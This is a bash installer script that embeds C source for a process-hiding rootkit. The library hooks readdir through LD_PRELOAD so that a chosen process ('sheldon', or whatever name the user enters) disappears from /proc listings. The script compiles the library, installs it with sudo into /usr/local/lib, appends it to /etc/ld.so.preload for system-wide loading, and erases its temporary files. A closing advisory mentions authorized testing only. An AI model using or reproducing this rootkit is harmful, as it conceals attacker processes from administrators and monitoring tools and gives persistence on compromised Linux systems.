#!/usr/bin/env bash

echo -e "\n\033[1;34m_________________________________________________________\033[0m\n"

# Function to create a new directory and change to it
function mktempdir() {
    new_dir=$(mktemp -d)
    echo -e "\033[1;32mDirectory created at: $new_dir\033[0m"
    cd "$new_dir" || return
    echo -e "\033[1;33mChanged to directory: $PWD\033[0m"
    echo -e "\n\033[1;34m_________________________________________________________\033[0m\n"
}

# Call the function to create the directory and prepare it for use
mktempdir

# Copy the necessary files to the new directory
cat <<'EOF' > "$new_dir/processhider.c"
#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "sheldon";

/*
 * Get a directory name given a DIR* handle
 */
static int get_dir_name(DIR* dirp, char* buf, size_t size)
{
    int fd = dirfd(dirp);
    if(fd == -1) {
        return 0;
    }

    char tmp[64];
    snprintf(tmp, sizeof(tmp), "/proc/self/fd/%d", fd);
    ssize_t ret = readlink(tmp, buf, size);
    if(ret == -1) {
        return 0;
    }

    buf[ret] = 0;
    return 1;
}

/*
 * Get a process name given its pid
 */
static int get_process_name(char* pid, char* buf)
{
    if(strspn(pid, "0123456789") != strlen(pid)) {
        return 0;
    }

    char tmp[256];
    snprintf(tmp, sizeof(tmp), "/proc/%s/stat", pid);
 
    FILE* f = fopen(tmp, "r");
    if(f == NULL) {
        return 0;
    }

    if(fgets(tmp, sizeof(tmp), f) == NULL) {
        fclose(f);
        return 0;
    }

    fclose(f);

    int unused;
    sscanf(tmp, "%d (%[^)]s", &unused, buf);
    return 1;
}

#define DECLARE_READDIR(dirent, readdir)                                \
static struct dirent* (*original_##readdir)(DIR*) = NULL;               \
                                                                        \
struct dirent* readdir(DIR *dirp)                                       \
{                                                                       \
    if(original_##readdir == NULL) {                                    \
        original_##readdir = dlsym(RTLD_NEXT, #readdir);               \
        if(original_##readdir == NULL)                                  \
        {                                                               \
            fprintf(stderr, "Error in dlsym: %s\n", dlerror());         \
        }                                                               \
    }                                                                   \
                                                                        \
    struct dirent* dir;                                                 \
                                                                        \
    while(1)                                                            \
    {                                                                   \
        dir = original_##readdir(dirp);                                 \
        if(dir) {                                                       \
            char dir_name[256];                                         \
            char process_name[256];                                     \
            if(get_dir_name(dirp, dir_name, sizeof(dir_name)) &&        \
                strcmp(dir_name, "/proc") == 0 &&                       \
                get_process_name(dir->d_name, process_name) &&          \
                strcmp(process_name, process_to_filter) == 0) {         \
                continue;                                               \
            }                                                           \
        }                                                               \
        break;                                                          \
    }                                                                   \
    return dir;                                                         \
}

DECLARE_READDIR(dirent64, readdir64);
DECLARE_READDIR(dirent, readdir);
EOF
cp /opt/4rji/bin/Makefilesheldon "$new_dir/Makefile"
echo -e "\033[1;36mFiles copied to the new directory.\033[0m"
echo -e "\n\033[1;34m_________________________________________________________\033[0m\n"

# Function to ask the user if they want to modify the file processhider.c
function modify_file() {
    echo -e "\033[1;31mDo you want to modify processhider.c? (y/n): \033[0m"
    read -n1 response
    echo ""
    case $response in
        [Yy]* )
            ps -faux | grep sheldon1
            echo ""
            echo -e "\033[1;33mEnter the process name (for sheldon type 'python3'):\033[0m"
            read -r text
            text_escaped=$(echo "$text" | sed 's/[&/\]/\\&/g')
            sed -i "s/\(static const char\* process_to_filter = \)\".*\";/\1\"$text_escaped\";/" processhider.c
            echo -e "\033[1;32mFile successfully modified.\033[0m"
            ;;
        * )
            echo -e "\033[1;31mNo modifications made.\033[0m"
            ;;
    esac
    echo -e "\n\033[1;34m_________________________________________________________\033[0m\n"
}

# Call the function to ask the user if they want to modify the file
modify_file

# Compile the code
if make_output=$(make 2>&1); then
    echo -e "\033[1;32mCompilation successful.\033[0m"
else
    echo -e "\033[1;31mCompilation error.\033[0m"
    echo "$make_output"
    exit 1
fi
echo -e "\n\033[1;34m_________________________________________________________\033[0m\n"

# Move the library to the appropriate directory and add it to ld.so.preload
if [ ! -f libprocesshider.so ]; then
    echo -e "\033[1;31mError: libprocesshider.so was not generated.\033[0m"
    exit 1
fi
sudo mv libprocesshider.so /usr/local/lib/
echo "/usr/local/lib/libprocesshider.so" | sudo tee -a /etc/ld.so.preload > /dev/null
echo -e "\033[1;36mLibrary added to ld.so.preload.\033[0m"
echo -e "\n\033[1;34m_________________________________________________________\033[0m\n"

# Delete all files in the temporary directory without confirmation
rm -rf "$new_dir" > /dev/null 2>&1
echo -e "\033[1;32mTemporary files deleted.\033[0m"
echo -e "\n\033[1;34m_________________________________________________________\033[0m\n"

# Final message
echo -e "\033[1;33mADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.\033[0m"
